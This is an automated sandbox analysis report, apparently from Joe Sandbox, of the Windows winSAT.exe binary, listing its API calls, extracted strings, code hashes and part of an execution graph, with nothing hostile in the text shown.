                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType
                                                                                                                                                                                              • String ID: H$H
                                                                                                                                                                                              • API String ID: 4177115715-136785262
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 3677997916-3888772845
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: iswdigit$StringType
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID: BrandingFormatString$BrandingLoadString
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1452528299-1001986530
Memory Dump Source
• Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
Similarity
• API ID:
• String ID: $string too large to process
• API String ID: 0-3116065436
Similarity
• API ID: CloseHandle
• String ID: @
• API String ID: 2962429428-2766056989
Similarity
• API ID: iswdigit$StringType
• String ID:
• API String ID: 3141519268-0
Similarity
• API ID: ErrorLast$CloseCriticalDeleteHandleSection
• String ID:
• API String ID: 505967962-0
Similarity
• API ID: ErrorHandleInformationLast
• String ID:
• API String ID: 1721798545-0
Similarity
• API ID: ErrorHandleInformationLast
• String ID:
• API String ID: 1721798545-0
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$FormatFreeLocalMessagememcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3774668041-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3993060814-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4993
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49A0
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegOpenKeyExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49CF
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A0C
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A73
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AA6
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AD6
                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00007FF780FD91B6
                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00007FF780FD91D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcsicmp$QueryValuememset$Open
                                                                                                                                                                                              • String ID: AMD$Intel
                                                                                                                                                                                              • API String ID: 2659426807-812452489
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE362
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE37B
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCriticalCurrentEnterHandleProcessSectionTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Cannot stop ETW tracing; %s$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 697001006-2049587427
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD7964
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenFileMappingW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A21
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A49
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A68
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A89
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: MapViewOfFile.KERNEL32 ref: 00007FF780FD7ACA
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: memset.MSVCRT ref: 00007FF780FD7AED
                                                                                                                                                                                              • memset.MSVCRT(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD798D
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD79C0
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD79D8
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EventOpen$Filememset$CriticalEnterMappingObjectSectionSingleViewWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3303213161-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$ErrorLast$FindHandleLoadLockModuleSizeof
                                                                                                                                                                                              • String ID: base\winsat\exe\app.cpp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$AttributesFile
                                                                                                                                                                                              • String ID: all$base\winsat\exe\viewlog.cpp
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: p not in the string
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invlaid size for new_size
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModuleStringType
                                                                                                                                                                                              • String ID: CompletionStatus$description
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ___lc_codepage_func___lc_handle_funclocaleconv
                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowmallocstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: reserve is equal to npos
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greter than length
                                                                                                                                                                                              • API String ID: 1480402491-672107844
                                                                                                                                                                                              • Opcode ID: 24a249c6ab7209199c0410a201d11d9577aaf78771c9d7fd7dc51e5b67ac7989
                                                                                                                                                                                              • Instruction ID: 4a56b088f954d706807440313dd8524d79d058b94e962cc985f982402a9361d0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24a249c6ab7209199c0410a201d11d9577aaf78771c9d7fd7dc51e5b67ac7989
                                                                                                                                                                                              • Instruction Fuzzy Hash: F711B4A1B1C78280EE60B712E8113B9A210BF55BA8FE0A231DA6D477D1DF6CF415C710
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greater than string length
                                                                                                                                                                                              • API String ID: 1480402491-927503826
                                                                                                                                                                                              • Opcode ID: a3d748886562dba9ff42824ddac9caf1b5391840cd1e00183c0b5253ee5438e2
                                                                                                                                                                                              • Instruction ID: 35db4ef6c4c29ac06ecd58e734c1a66bb60cc7396df312f8ca62badee742af79
                                                                                                                                                                                              • Opcode Fuzzy Hash: a3d748886562dba9ff42824ddac9caf1b5391840cd1e00183c0b5253ee5438e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: A611E661A1CA4680EE10F716F8517B99350BF99BD4FE06131EA5E037E2DE6CE156C710
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                              • API String ID: 1480402491-1799206989
                                                                                                                                                                                              • Opcode ID: be1d8c21d7ee3f6481f5d55a1fe96d7ded0db2a5d223960b112df610f920373f
                                                                                                                                                                                              • Instruction ID: 8df899cca031346e68aa41f93a0be0ea7351f6b8a60a37788d8a2dc36415f19c
                                                                                                                                                                                              • Opcode Fuzzy Hash: be1d8c21d7ee3f6481f5d55a1fe96d7ded0db2a5d223960b112df610f920373f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A112962A2DB8681DF10FB01F8412A8E360FB44760FE44232D55D067E4EFBCE545C720
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: 432fdd1150fd00a91c27c5e83cee7ce573169d03121ce404c2ea4128de2b112a
                                                                                                                                                                                              • Instruction ID: 243d49202fba99573f041e532fe6615a83a89a75b7bc7a9b6f56880f0c63b87b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 432fdd1150fd00a91c27c5e83cee7ce573169d03121ce404c2ea4128de2b112a
                                                                                                                                                                                              • Instruction Fuzzy Hash: DD110A61A1CB4585EE50E725E801365A3A0BB44BB8FF09330D5BD473D6EF6CE156C750
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: a40e51b2add9990d476b81021722185fca1117277a0c71a5a158a92b751de0e5
                                                                                                                                                                                              • Instruction ID: 37a0488a8cd4475f156eb79eda24b8cdb120bd8a6dcce97c7c0cd0a34031f9c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a40e51b2add9990d476b81021722185fca1117277a0c71a5a158a92b751de0e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D11E371E1DB4681EE60E724E8053A5A3A0BB557B4FF09330D6BD463D2EE2CE146C720
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: n is equal to npos
                                                                                                                                                                                              • API String ID: 1480402491-1397133512
                                                                                                                                                                                              • Opcode ID: a56e1a8313d600a04dffc9f24096c87064267ef3a33ea9983d78aeba4a01a386
                                                                                                                                                                                              • Instruction ID: 988914f1f8be58d0b295784c2799204c6873664d1a41fc266390c46be8ed58f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: a56e1a8313d600a04dffc9f24096c87064267ef3a33ea9983d78aeba4a01a386
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8110661E18B4685EE60A725E801365A3A0BB457B8FF09330D67D473D2EF6CE156C710
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot get text from an XML node
                                                                                                                                                                                              • API String ID: 0-3808574510
                                                                                                                                                                                              • Opcode ID: 7b1eedf36150c6d89b36d15e59500e28cdbdd8679d6886e9a5fef9680c7da983
                                                                                                                                                                                              • Instruction ID: 581ad8dc01d2471944c209506cf5917743e52879ab4e6a221f71e68908d03f17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b1eedf36150c6d89b36d15e59500e28cdbdd8679d6886e9a5fef9680c7da983
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82118432A0CB4182E7009B16E884069B764FB99BA0FB49335EBBD477E4CF38E541CB50
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowmemcpystd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: bufsizeP == npos
                                                                                                                                                                                              • API String ID: 2064173360-365732818
                                                                                                                                                                                              • Opcode ID: 274b02a7e7339dfa6fc1670b01fdd4a639736e48d595a7a2cf6559ae513f1588
                                                                                                                                                                                              • Instruction ID: 05cbeb0f706dc5c45bea6dcc96b11e585cf66004ab28735f5e963cf4129a10f0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 274b02a7e7339dfa6fc1670b01fdd4a639736e48d595a7a2cf6559ae513f1588
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301C861A28A4582EB20E729E851369A351BB44774FF09330E6BD467D5DE7CD146C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileHandleWrite
                                                                                                                                                                                              • String ID: ped
                                                                                                                                                                                              • API String ID: 3320372497-699262028
                                                                                                                                                                                              • Opcode ID: 7259f41d63e7516aa0fb7fdb7bb17415d68327f18a4c8a9ceec51de51e53a920
                                                                                                                                                                                              • Instruction ID: d9e623a56053eb9cbdbc0f98e2f9de44f9f745270f5c28bd4a61358fc4b2d036
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7259f41d63e7516aa0fb7fdb7bb17415d68327f18a4c8a9ceec51de51e53a920
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0811842260CAC2DAD760DF21E8001BAB770FB89365F915272DA8D82655DF7CD445CF10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: at is larger than buffer size
                                                                                                                                                                                              • API String ID: 1480402491-1724294285
                                                                                                                                                                                              • Opcode ID: 14a9bf9f0102a18dc08db66d1f8f921d544cde58858c86fd64909c94ae5e0084
                                                                                                                                                                                              • Instruction ID: 908ff14dbed8341e02414dc4292aaca59828bac3c61886d8af1358dfb52cac62
                                                                                                                                                                                              • Opcode Fuzzy Hash: 14a9bf9f0102a18dc08db66d1f8f921d544cde58858c86fd64909c94ae5e0084
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C012861B28A8581EB60E725E85136DB360FF857A0FE09231D5AD03BE5DF3CE406C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorFileLast
                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                                              • API String ID: 1214770103-2935326385
                                                                                                                                                                                              • Opcode ID: 6cce27e09e26122c475b376ae0f9fac36c40ee016db69fc92a342f9df983f907
                                                                                                                                                                                              • Instruction ID: b378e671099ce67b4282f954463d3e15cff956284ddcf93ea9954b1fe779cb94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cce27e09e26122c475b376ae0f9fac36c40ee016db69fc92a342f9df983f907
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4019232A1C64182E710AB10E85477ABA60FB85B74FA09334EA7D067E5CF7CE555CB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4164033339-0
                                                                                                                                                                                              • Opcode ID: 27d990295899a2b8ebf7f0e9744a37e411a4e5368bcdd4215ea8016d0dded8a4
                                                                                                                                                                                              • Instruction ID: 5eaca808e6ad7bec68c703087605b7ef5fdf3e0b654efb30368d496661851a26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27d990295899a2b8ebf7f0e9744a37e411a4e5368bcdd4215ea8016d0dded8a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511E226F0974681EB54AB269805139E760FB85FE0FA88234CE5E537E4DE7CF441C310

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.2%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:2.4%
                                                                                                                                                                                              Total number of Nodes:1850
                                                                                                                                                                                              Total number of Limit Nodes:85
32630->32632 32632->32633 32633->32432 32634 7ff78100b7cf 32864 7ff780fa9e40 38 API calls 32634->32864 32637 7ff78100b7e8 32638 7ff780fa9c0c 38 API calls 32637->32638 32639 7ff78100b7f7 32638->32639 32643 7ff780fa2944 38 API calls 32639->32643 32640 7ff78100b8bc FreeLibrary 32641 7ff78100b8cf 32640->32641 32866 7ff781018b90 IsWindow DestroyWindow GetModuleHandleW UnregisterClassW 32641->32866 32642 7ff78100b870 32642->32640 32642->32641 32645 7ff78100b8a9 32642->32645 32644 7ff78100b802 32643->32644 32647 7ff780fa28c4 36 API calls 32644->32647 32645->32642 32648 7ff78100b80a 32647->32648 32649 7ff780fa7e24 free 32648->32649 32649->32626 32651 7ff780fa06e8 32650->32651 32652 7ff780fd5438 CancelWaitableTimer CancelWaitableTimer CancelWaitableTimer SetEvent WaitForSingleObject 32650->32652 32651->32449 32653 7ff780fd54a5 32652->32653 32654 7ff780fd54db 32652->32654 32867 7ff780fcedc4 36 API calls numpunct 32653->32867 32656 7ff780fd5519 32654->32656 32868 7ff780fcedc4 36 API calls numpunct 32654->32868 32657 7ff780fd5565 CloseHandle CloseHandle CloseHandle CloseHandle 32656->32657 32658 7ff780fd551e GetLastError 32656->32658 32662 7ff780fce3ac 23 API calls 32657->32662 32869 7ff780fce694 55 API calls numpunct 32658->32869 32659 7ff780fd54bd GetCurrentProcess TerminateProcess 32659->32654 32662->32651 32663 7ff780fd54f9 GetCurrentProcess TerminateProcess 32663->32656 32664 7ff780fd5545 GetCurrentProcess TerminateProcess 32664->32657 32667 7ff780fa04d3 32665->32667 32668 7ff780fa8a58 32665->32668 32666 7ff780fa8a65 GetStringTypeExW 32666->32668 32667->32415 32669 7ff780fdb218 RegOpenKeyExW 32667->32669 32668->32666 32668->32667 32670 7ff780fdb26e RegQueryValueExW 32669->32670 32673 7ff780fdb2af 32669->32673 32670->32673 32671 7ff780fdb2eb RegCloseKey 32672 7ff780fa0506 32671->32672 32672->32415 32674 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 32672->32674 32673->32671 32673->32672 32674->32415 32675->32427 32676->32426 32677->32445 32679->32467 32680->32474 
32681->32475 32683 7ff7810a4540 numpunct 2 API calls 32682->32683 32684 7ff780fa80f9 32683->32684 32686 7ff780fa812c 32684->32686 32795 7ff780fac6d0 6 API calls numpunct 32684->32795 32686->32482 32688 7ff780fa8d99 32687->32688 32689 7ff780fa8ece 32687->32689 32796 7ff780fa9630 32688->32796 32689->32528 32692 7ff780fa8ddb 32697 7ff780fa8df8 32692->32697 32806 7ff780fabdc8 GetStringTypeExW GetStringTypeExW 32692->32806 32693 7ff780fa8e00 32693->32689 32808 7ff780fa8810 32693->32808 32695 7ff780fa8e25 GetStringTypeExW 32695->32697 32697->32693 32697->32695 32807 7ff780fabdc8 GetStringTypeExW GetStringTypeExW 32697->32807 32699 7ff780fa8e80 memmove 32699->32693 32699->32697 32701 7ff7810a4540 numpunct 2 API calls 32700->32701 32703 7ff780fa8039 32701->32703 32702 7ff780fa80a1 32707 7ff780faf844 32702->32707 32703->32702 32705 7ff780fa8083 32703->32705 32706 7ff780fa80ba _CxxThrowException 32703->32706 32849 7ff780fac6d0 6 API calls numpunct 32705->32849 32708 7ff780fa80d4 6 API calls 32707->32708 32709 7ff780faf881 32708->32709 32710 7ff780fa80d4 6 API calls 32709->32710 32711 7ff780faf88b 32710->32711 32712 7ff780fa80d4 6 API calls 32711->32712 32713 7ff780faf8b9 32712->32713 32714 7ff780fa9630 7 API calls 32713->32714 32715 7ff780faf8d6 32714->32715 32716 7ff780faf8f7 32715->32716 32850 7ff780fa8338 38 API calls std::bad_exception::bad_exception 32715->32850 32718 7ff780faf915 32716->32718 32719 7ff780faf946 32716->32719 32722 7ff780fa8410 29 API calls 32718->32722 32720 7ff780faf9cb 32719->32720 32721 7ff780faf94c 32719->32721 32724 7ff780fa80d4 6 API calls 32720->32724 32853 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32721->32853 32725 7ff780faf91d 32722->32725 32726 7ff780faf9d4 32724->32726 32851 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32725->32851 32856 7ff780f93a1c 42 API calls numpunct 32726->32856 32728 7ff780faf990 32732 7ff780fa7e24 free 32728->32732 32730 7ff780faf937 32852 7ff780f93a1c 42 API calls numpunct 
